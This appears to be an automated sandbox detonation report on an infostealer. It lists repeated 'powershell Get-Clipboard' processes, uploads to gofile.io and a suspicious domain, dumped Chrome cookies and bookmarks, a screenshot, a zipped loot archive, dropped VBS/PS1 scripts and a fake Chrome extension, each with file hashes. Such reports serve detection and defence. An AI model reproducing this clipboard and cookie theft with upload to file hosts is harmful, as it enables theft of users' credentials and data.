C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 104.21.59.75:443 | nova-screen-webview.com | tcp |
| GB | 142.250.187.196:80 | www.google.com | tcp |
| US | 104.21.59.75:443 | nova-screen-webview.com | tcp |
| US | 104.21.59.75:443 | nova-screen-webview.com | tcp |
| US | 104.21.59.75:443 | nova-screen-webview.com | tcp |
| US | 104.21.59.75:443 | nova-screen-webview.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| IT | 185.196.9.89:443 | nova-sentinel.com | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 136.175.10.233:443 | store3.gofile.io | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| IT | 185.196.9.89:443 | nova-sentinel.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 206.168.191.31:443 | store8.gofile.io | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\f5c3e2bb-50d8-4eb3-8d79-1bd7bcb644c7.tmp.node
| MD5 | 788348b87988dce46686ef36eff62bf5 |
| SHA1 | a3a41f0e048d54714b6ffaa7910a642c5a306330 |
| SHA256 | 7956056e0c6d81779b2b9a106d05b8722c8a33294f45c8f3e96271d69f07d055 |
| SHA512 | b14559aff1eec45a37a2f2df314203ff31b6ec1c2ce527b3605733db2ca2c40f0170f62c5769ea82cb2cfaac79a9db675c721dc81064d0f91c14526f24c24aec |
C:\Users\Admin\AppData\Local\Temp\6c3c1739-0166-48f0-a7ae-df0085471299.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
C:\Users\Admin\AppData\Local\Temp\8e0b5a30-9f05-4f6c-b324-1d544420e205.tmp.node
| MD5 | fc4a8c9e90f8b7c10cfee47dfed0c9d7 |
| SHA1 | 825f59a4a1bc62021f45a3ecc47323e6a9491068 |
| SHA256 | 74bf94b848211cf5b60830f2823c5561658c8c02f4b337eaf9b330d7bcdb2288 |
| SHA512 | d55cf96fccca80b230afdda4a2ffb83379be286ca74143a21c05b6cbb41895d7f7c3d58ab09e38972e4715c51ad2539c38c8d0a19c82f2c1968fdbe4a143e2c0 |
memory/2296-26-0x000001933F5D0000-0x000001933F5F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2gv53j4r.agx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Local\Temp\qVFxMPFEMPsS_tezmp.ps1
| MD5 | 5a610fcc20dc6fd82247de5448b6994e |
| SHA1 | 5beb26e990267deb573b0691589ae89ad5a3213d |
| SHA256 | 1219219569894d14c73a5ee8644038596f0b4965cf120704c474f54d0afe9fa1 |
| SHA512 | 00f2c5e54a516c7438236ede62cf7e847a646b53a533ec02fbc40378d2b7a8f9935e2b234697dcdc336d6b274da7c49ceb0dd5c958d14607a2115ea810d44f28 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6e5843696d70df783161968b9f9e1759 |
| SHA1 | 6e7ab4a749b553ff66e8914563ca9f98cabe3ecd |
| SHA256 | 51f80b81fae4ad9aa2b195b561274799f4bab0b9c12b0b86748044f12bbab719 |
| SHA512 | 5b44b40619c0467fc41009a5ca7638ae3ab948757c4707b8439c7485635d9cfb120406d76e330b0993f17f63739a7d8d40e3ae71574a89428501ab63a44e9093 |
C:\Users\Admin\AppData\Local\Temp\3tKPJXrtX3UiKTZcFfvL\System\UOECDFVI - 2024-06-12_143612.png
| MD5 | bd46980d6b26c64efeac1d02863247da |
| SHA1 | 471de13e5c283e6ccf13c39b262fc0132655477d |
| SHA256 | aa3b520ec2080e40764c8806e3ccd46ed9caf591ed358d3f0d5b827e0a7a62f9 |
| SHA512 | 99a9cd9a2772139bb5a33e7c88afd26e47e284b0c3365676ad631a88c1b050b134222892c65e287022887295395cd0bc519adbd9107d1a58c19f7aec74f22c20 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6903d57eed54e89b68ebb957928d1b99 |
| SHA1 | fade011fbf2e4bc044d41e380cf70bd6a9f73212 |
| SHA256 | 36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52 |
| SHA512 | c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e |
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip
| MD5 | cbf20d905062bd5701e81f448df57e83 |
| SHA1 | 8934fbdf05abe9435339bcd6eab50890c064be62 |
| SHA256 | 3b3a5f2a9fbbe18e07693cfaf77190765208402d5578ea9d65052d0208335846 |
| SHA512 | 7aed668fd0bad62496fd483fb230883fb1be402bd477f1dd74e0c7fabcacc93242c5f610930815f4c95550abf940b4cb0626750d216d8b44a293c50f9bc7c32c |
C:\Users\Admin\AppData\Local\Temp\3tKPJXrtX3UiKTZcFfvL\Browsers\Chrome [ Default ] - Cookies.txt
| MD5 | 416fd171d2f5eb20bcacc481a99d74a1 |
| SHA1 | 9138b865308efaf3ec1ef51bab3917e4fe5d29eb |
| SHA256 | f859c2ba34bc58e1df76a5f1243858bb721cd93e5934dc2eeab86193f88b9da9 |
| SHA512 | d6718c7e6bbd3a5a5fea6b8af6177f30c2c8e075619d8c7614f1f40874a404399830cc5ad4f5f349209191d4928b8900b06813b331801169c7bf61d28bf48116 |
C:\Users\Admin\AppData\Local\Temp\3tKPJXrtX3UiKTZcFfvL\Browsers\Bookmarks.txt
| MD5 | 18e8c8afc0c5613cac3916e3a28fa9f1 |
| SHA1 | c0aaa69cddd31830f7ca218c33285e71d9cd1cb0 |
| SHA256 | ae25ff98749cf68d90dc60e5dc5284a44b439327f44b34d1abb3b8f10f1a3a0b |
| SHA512 | 697a62f6431a94e2686e67bf48a3f01d2f9e7be03ab93d0f48d107d7a6225397af9aeb291e1cf3082818b0f14b8afe73a3596217d9ac3cedac914afcd385818f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 052b68d98977d4f52cc6afabfa743b06 |
| SHA1 | 63b671a71cc5ec6b76218b0094784a5e21e08e7f |
| SHA256 | 199ac916bb90b9b2107eb749d5c65411c387c7d59f0a2d19d17674983287116a |
| SHA512 | e20517e1d3b755c17c617f9cbab3de19a4b29fc16a3422bbde30530130c2865173b85ee24e336b20c4706740250bc062f789d0c6989d4ed15c6f8527033693af |
C:\Users\Admin\AppData\Roaming\B6oH2b5ScvRb.vbs
| MD5 | 9aa97c8b78a15df954f2c0c1ce0be81b |
| SHA1 | c8cd2e0b9c49296bd0eba17d2b18234d628e0ae3 |
| SHA256 | 4f7db2b5db7c0971d808530b5cc22749f4b053709c775b711413898855ef4911 |
| SHA512 | d6424bd1bfd3e9739d3c8069c383c7e46fc9e4be5d58e53cd230a58efe06c092cf4ed743b15b4982bab49b6061e48abb0fe727f7371679652b3fc4247151585e |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png
| MD5 | 252b4fda07550496d330d819f15ceb3e |
| SHA1 | 650584312b310219a26d5fc20cb1804bb6c4dde5 |
| SHA256 | 39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d |
| SHA512 | a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png
| MD5 | c555604e8b6f818991e186342f856b1b |
| SHA1 | 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0 |
| SHA256 | 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972 |
| SHA512 | 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png
| MD5 | f0f11cd478cc44d518c16820ede9d253 |
| SHA1 | cfaf8d2e071f2ade0894578e5b44e02032d27be4 |
| SHA256 | 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb |
| SHA512 | ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png
| MD5 | 2f0a6a34d9b95bba0e3358ddd41ff2ac |
| SHA1 | f39a9e7aeab9fe86fd9034284516de40186e6e93 |
| SHA256 | 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5 |
| SHA512 | a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084 |
C:\Users\Admin\AppData\Roaming\salut9VvRW.ps1
| MD5 | 4fdddf586aed433adb0bfe7362592055 |
| SHA1 | a0e31dcb709ccd9e7078529880c66611d7f418ea |
| SHA256 | 4e26e8214c7ebcb5afa23bc8f5e545dd9c8a782a7ee1d3d40531cf4ee09fbac0 |
| SHA512 | 99c4fe58658e487fa54d82d1c041c2af5efdafc98dc1e079d3a250b973a435aef488e334849a0e052f6b99546df6d6518cf43b4d606edf5fc637169000ae2362 |
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\GooseDesktop.exe
| MD5 | c883e2c769ebe56240a71260b17f1b93 |
| SHA1 | 4a831d4f48f6ea81db508c2a87cf860acd17edb1 |
| SHA256 | 943fd1ea44266c5d7fa02f2b292db095a4e6ba8027a1f6c73fd60d1165e63aff |
| SHA512 | dae40d442794152285ce484b10095d11592a39cb1968bd38cc70ee23005bd1e04ad4312d7266107bdd375e10fa91ab9fd3d41d4d6ccd2268d052b343528c4376 |
memory/928-344-0x0000000000FD0000-0x000000000100E000-memory.dmp
memory/928-345-0x0000000005AF0000-0x0000000005B82000-memory.dmp
memory/928-346-0x0000000006140000-0x00000000066E6000-memory.dmp
memory/928-347-0x0000000005AB0000-0x0000000005ABA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\GooseModdingAPI.dll
| MD5 | 9eb11041f2f11d939074e26b4b554088 |
| SHA1 | 50deec7591fcc5db40939543fc9bf92109f2df05 |
| SHA256 | efa31df7ab1394092395365805f913dd023cdcd21796603f133641524fb9ad79 |
| SHA512 | 2d07f40f56ae0dcaba51bc65e4617a0bfd67be13be5156fd7c2850645a461f87b97e46b2c596c21752df2aa488f6e6c329534a523bd7f88234be956b8af13bd1 |
memory/928-351-0x0000000006110000-0x000000000611A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\config.ini
| MD5 | 072813d2253b25cbcd5858226f5f17a0 |
| SHA1 | c114c97f887e56efc0941ad37ffb3f6730195eac |
| SHA256 | cfeb29c3953c0a6ae97ab52d912311c94e0ab0df87c63ba32770ba4a714d0022 |
| SHA512 | a413ad200790b7a6f109213e73abf3eb20da0608b7b6826f5347e26b519c64581bebab3bf34c91c4aa7cc1181e73d8d824c1eec70aed07c222ef30bcc8779ee3 |
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk1.mp3
| MD5 | db2b7cf36003b2b653df6f3ca986e007 |
| SHA1 | d61a94c7b965dec3daa6351d849fa22f646edf8b |
| SHA256 | 56a240ddfbb494a6cb5c02a1271b5cc9a79217c53b481d9d3240b4973808d65b |
| SHA512 | 3c5ba0484567bd520334837c54df160b26d3a3be952474aedf23a946369bada58241dc43a471d8e9e652e0b682599f1c5dbd03e39fe8c1f6182b806b6939eef3 |
memory/928-354-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-355-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-356-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-357-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-358-0x0000000007A60000-0x0000000007A70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\Assets\Sound\NotEmbedded\MudSquith.mp3
| MD5 | b2354d238829d09c54e272d8b4f60189 |
| SHA1 | 5a2731c04c50903d41f65d9fe5528a66cbefa289 |
| SHA256 | d5281ba99731fe3c443b6b2d18960a49e74b5b407956d3e1a3cde360f86573ba |
| SHA512 | aafbc687b5eac32fe1b4d838ab1ac88103d7f59d0b5f51519845abdd9ae37147e73143e6039719c3d06915107397e3e0a666d0cb1677cdbe05bccebea69ecaf9 |
memory/928-360-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-361-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-363-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-362-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-364-0x0000000007A60000-0x0000000007A70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\Assets\Sound\Music\Music.mp3
| MD5 | ecd3eedd1f783552e35f5bec18887ff7 |
| SHA1 | ab75a39baf2311570db5a4d90566a8746fdecc01 |
| SHA256 | 652b3eb51dfc7cdd774b5c1103d69ae6c820190159d64cb477a4836096a639d7 |
| SHA512 | 14351e2f978f762982fd91f9e9ce6164f02e445b9de839ed603df67f0502863d6d34551401b675bd486d568adf509543fa55ac15eb7a1d77c2fd88ced109f994 |
memory/928-366-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-369-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-370-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-368-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-367-0x0000000007A60000-0x0000000007A70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk4.mp3
| MD5 | 9b24558524e7f3ec1dd7d123d10541fc |
| SHA1 | d373cc754817870f18d640c6fa04627c74e8f518 |
| SHA256 | 46aea3ca7321989695db5b15f7997802a6266512d6fe298a26dee9dd6a98ba87 |
| SHA512 | e6e0c4e77143e778599b4952c0e0741b8cd092d08179c4b4f1b63698562ec3bcf362888585e253cb53113d3c51b6225d8d4e43cd95b7122c7c2881828d392397 |
memory/928-372-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-374-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-376-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-375-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-377-0x0000000007A60000-0x0000000007A70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\Assets\Images\Memes\HmtM.gif
| MD5 | 405cbe37af275d21d2eeea6acac5ca0b |
| SHA1 | f39a2c89cc599da587af76db55369c3726b1034b |
| SHA256 | 1e4bd8d3ad3d76672743845e75376a9a1996d506fa1bfe4f01842115c2537cb4 |
| SHA512 | 385f1d9b604ba11fa020f58e1b54a13448f939cf4a281faafccaa4d07f56f5577562db13d607f0aa2b592e442aed5c3bf71fa5a18cf9c23d407dcc1d23b5f2d9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7355f4a1d4e1a2519a4a60ee11f1d192 |
| SHA1 | 8802bbb71f3e8947c02a7d835b31c7abf4289780 |
| SHA256 | 2fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3 |
| SHA512 | 7186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | edc94d6cffeec0aa87c5efc4d515f79a |
| SHA1 | 8ab843d139d849f5e72008e14013aa1008945e6d |
| SHA256 | 47d73c514b6ba6bea241dac0491ce942cedb7a5fb9621dca3c95ce5511f272f2 |
| SHA512 | 0b9505035c2b8a9094647be0836afe701489d5b51ac758d13233c1e563809b219bb4443f2e527503af14573c32d733618dab1a35c8c7b789fbe4d52711572f11 |
memory/928-559-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-563-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-562-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-561-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-560-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-2429-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-2432-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-2434-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-2433-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-2431-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3588-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3593-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3594-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3592-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3591-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3590-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3598-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3597-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3596-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3595-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3616-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3620-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3619-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3618-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3617-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3730-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3742-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3741-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3740-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-3739-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4013-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4017-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4016-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4015-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4014-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4063-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4068-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4065-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4067-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4066-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4240-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4249-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4250-0x0000000007A60000-0x0000000007A70000-memory.dmp
memory/928-4251-0x0000000007A60000-0x0000000007A70000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-12 14:34
Reported
2024-06-12 14:38
Platform
win11-20240419-en
Max time kernel
129s
Max time network
147s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |